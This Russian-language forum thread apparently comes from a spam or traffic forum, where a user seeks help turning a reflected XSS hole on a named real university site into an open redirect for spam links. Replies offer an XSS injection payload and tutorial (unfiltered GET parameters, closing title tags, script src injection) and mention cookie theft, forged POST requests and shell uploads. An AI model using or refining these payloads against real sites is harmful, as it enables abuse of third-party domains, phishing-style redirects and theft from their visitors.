Один интересный редирект

  • Автор темы Автор темы justhelen
  • Дата начала Дата начала
J

justhelen

Client
Регистрация
18.11.2009
Сообщения
267
Реакции
134
Баллы
43
Привет, я тут нашла одну интересную штуку, но не могу сообразить, как сделать через неё редирект. Может кто-нибудь догадается, у вас тогда тоже будет редирект через .эду домен :-) Ну а я буду знать, что можно попробовать сделать и с другими такими редиректами.

Код:
Развернуть Свернуть Копировать 
http://www.qu.edu.qa/tools/email.php?url="><img src=x onerror=window.location.replace(/http://site.com/);>

Проблема в том, что с "http://" не работает, видимо где-то его вырезает в скрипте. А без "http://" конечно не редиректит, потому что считает, что это редирект на какую-то страницу на своём же сайте, а потому выдаёт 404.

"http:////", "http:\\\\", "http:\/\/" уже пробовала, не работает. Может вы догадаетесь :-)
 
Ну не работает он. В чем именно нужно разобраться, в браузер вставил не работает, в вк вставил тоже не работает.
 
Mikhail B. написал(а):
Ну не работает он. В чем именно нужно разобраться, в браузер вставил не работает, в вк вставил тоже не работает.
Нажмите для раскрытия...
Блин :) Ну так он не работает, потому что нужно понять, как туда вставить скрипт. Это уязвимость на сайте, которая позволяет делать редирект. вот в этом месте я вставляю скрипт:

Код:
Развернуть Свернуть Копировать 
onerror=window.location.replace(/http://site.com/);

В таком виде да, не работает. Может можно как-то по-другому. Может где-то "/" доставить, может какой-то другой скрипт для редиректа, который туда подошёл бы (хотя я не представляю, но я и JS знаю плохо, у меня базовые знания).
 
А для чего? Если для спама, бот увидит просто "location.replace" и все поймет. куда круче (выглядят!) обфусцированные js редиректы, прикольная штука. Но не стал замораживаться по ней.
На будущее, темы где че-то палить хочешь, надо в скрытом создавать.
 
Mikhail B. написал(а):
А для чего? Если для спама, бот увидит просто "location.replace" и все поймет. куда круче (выглядят!) обфусцированные js редиректы, прикольная штука. Но не стал замораживаться по ней.
Нажмите для раскрытия...
Как показывает практика, если в ссылке location.replace, то никто ничего не палит :) В самой ссылке когда. Вот если бы это было на целевой странице в коде, тогда да, тогда палит. Ты наверное не так понял что-то. Обфусцированный редирект - это в коде страницы когда, я обычно так и делаю. А это ссылка. Чтоб её постить на сайт, это не в коде страницы, на которую будет ссылка.

Mikhail B. написал(а):
На будущее темы где че-то палить хочешь надо в скрытом создавать.
Нажмите для раскрытия...
То ещё палево :) Один такой редирект. Я знаю, где их взять десятки, если не больше.
 
Если кто-нибудь ещё думает, что это палево, можете мне в личку написать, если догадались, как сделать :) Я тогда тут говорить не буду. Хотя я это не считаю каким-то суперпалевом прямо.
 
тебе не на этот фрум
ище где люди шарят xss делать
там тебе и помогут

еще проблема в том что хром просто не пустит юзера по такой ссылке
HGsZfViKQCCAa8lDn2nsCg.png
 
alekwuy написал(а):
тебе не на этот фрум
ище где люди шарят xss делать
там тебе и помогут

еще проблема в том что хром просто не пустит юзера по такой ссылке
HGsZfViKQCCAa8lDn2nsCg.png
Нажмите для раскрытия...
Да мне не кажется, что тут совсем никто не шарит. Тем более, я думаю, что тут его легко сделать, просто я не догадалась. Про хром я знаю, но во-первых мне интересен сам принцип (не только в этом редиректе именно такое видела), поэтому просто стало интересно, как же сделать. В этом случае хром понимает и не пускает, в каком-то другом будет чуть отличаться редирект, может хром и пустит. А во-вторых есть же не только хром :-), вот ФФ пускает.

Кстати, ты первый человек, который вообще понял, что речь про xss :D
 
читайте за xss, вам правильно подсказали. Он где угодно может быть, хоть в post/get/cookies

зы. Это не только редиректы, через него можно даже post запросы слать (ага, с токеном), даже на заливку payload'a, даже админу :al:
ну и cookies угонять.

НО Я ВАМ НЕ СОВЕТУЮ ЭТО ДЕЛАТЬ.:bt:
 
  • Спасибо
Реакции: Mikhail B.
alekwuy написал(а):
какие например?
Нажмите для раскрытия...
Слушай, я их юзала давно, потом пропала необходимость т.к. там, где я их постила, они всё равно банились (вообще любые ссылки банились). Ты думаешь, я помню, какой редирект работал несколько месяцев назад? :) Но помню точно, что были некоторые с xss, которые работали в хроме. Можешь не верить :)
 
ol1ver написал(а):
читайте за xss, вам правильно подсказали. Он где угодно может быть, хоть в post/get/cookies

зы. Это не только редиректы, через него можно даже post запросы слать (ага, с токеном), даже на заливку payload'a, даже админу :al:
ну и cookies угонять.

НО Я ВАМ НЕ СОВЕТУЮ ЭТО ДЕЛАТЬ.:bt:
Нажмите для раскрытия...
Я знаю :) Т.е. я не делала такое, мне было не надо, вот я и не изучала, но вообще много чего можно сделать. Просто мне сейчас было интересно именно редирект сделать.
 
justhelen написал(а):
Слушай, я их юзала давно, потом пропала необходимость т.к. там, где я их постила, они всё равно банились (вообще любые ссылки банились). Ты думаешь, я помню, какой редирект работал несколько месяцев назад? :-) Но помню точно, что были некоторые с xss, которые работали в хроме. Можешь не верить :-)
Нажмите для раскрытия...
я женщинам не верю:D
 
  • Спасибо
Реакции: doc
justhelen написал(а):
Я знаю :-) Т.е. я не делала такое, мне было не надо, вот я и не изучала, но вообще много чего можно сделать. Просто мне сейчас было интересно именно редирект сделать.
Нажмите для раскрытия...
ну ищите сайты где не фильтруется get/post (в приоритете get), и скрипт выводит эту get/post переменную (соответственно не фильтруя). Ищите в исходном коде.

например url: ?order_id=666

а в исходном коде <title> Your order #666 </title>
получается вставляем payload - </title><script>alert('xss');</script><!--

Не забывайте что < ' и тп могут тоже экранироваться. Можно еще так <script scr=url></script>

Вангую след. топик - что значит ошибка You have an error in your SQL syntax;
Ну а там - как залить шелл :(
 
  • Спасибо
Реакции: alekwuy и justhelen
ol1ver написал(а):
Ну а там - как залить шелл :(
Нажмите для раскрытия...
Ага. А потом "прислали повестку, как быть, чего говорить?"
"Свалил в тайгу, как сделать усилитель радио-сигнала? Инет не ловит.":D
 
  • Спасибо
Реакции: alekwuy
ol1ver написал(а):
ну ищите сайты где не фильтруется get/post (в приоритете get), и скрипт выводит эту get/post переменную (соответственно не фильтруя). Ищите в исходном коде.

например url: ?order_id=666

а в исходном коде <title> Your order #666 </title>
получается вставляем payload - </title><script>alert('xss');</script><!--

Не забывайте что < ' и тп могут тоже экранироваться. Можно еще так <script scr=url></script>
Нажмите для раскрытия...

Прямо мануал :D Я вообще не то что бы сильно этим всем интересуюсь, я только для редиректов использовала :) Но после таких ответов интерес растёт конечно :D

ol1ver написал(а):
Вангую след. топик - что значит ошибка You have an error in your SQL syntax;
Нажмите для раскрытия...
Нет, такого топика не будет, я знаю SQL, не будет синтаксических ошибок там если что :D

ol1ver написал(а):
Ну а там - как залить шелл :(
Нажмите для раскрытия...
Не надо расстраиваться :)
 
Кстати, ребят, мне уже помогли с редиректом :) Один очень умный человек догадался, как сделать :) Так что, в принципе можно закрывать топик.

(Сделанным редиректом не поделюсь :D)
 
  • Спасибо
Реакции: alekwuy
justhelen написал(а):
Кстати, ребят, мне уже помогли с редиректом :-) Один очень умный человек догадался, как сделать :-) Так что, в принципе можно закрывать топик.

(Сделанным редиректом не поделюсь :D)
Нажмите для раскрытия...
а могла бы и поделится со мной)
дай мне контакты, мне прям интересно)
 
justhelen написал(а):
Кстати, ребят, мне уже помогли с редиректом :-) Один очень умный человек догадался, как сделать :-) Так что, в принципе можно закрывать топик.

(Сделанным редиректом не поделюсь :D)
Нажмите для раскрытия...
как будто это поможет,щас в лс начнут ломиться
 
  • Спасибо
Реакции: Sanekk
alekwuy написал(а):
а хром пускает?
Нажмите для раскрытия...
Не пускает :) Да и без разницы, меня сам принцип интересовал, что можно в тот скрипт засунуть, чтобы он работал.

alekwuy написал(а):
а могла бы и поделится со мной)
дай мне контакты, мне прям интересно)
Нажмите для раскрытия...
Так женщины же вообще плохие, ни с кем не делятся :D

Sanekk написал(а):
как будто это поможет,щас в лс начнут ломиться
Нажмите для раскрытия...
Ну, ты после другой моей темы наверное знаешь, как быстро можно попасть в игнор :) Так что, если будут ломиться, у меня есть быстрое решение :D
 
Войдите или зарегистрируйтесь для ответа.

Кто просматривает тему: (Всего: 0, Пользователи: 0, Гости: 0)

Сверху Снизу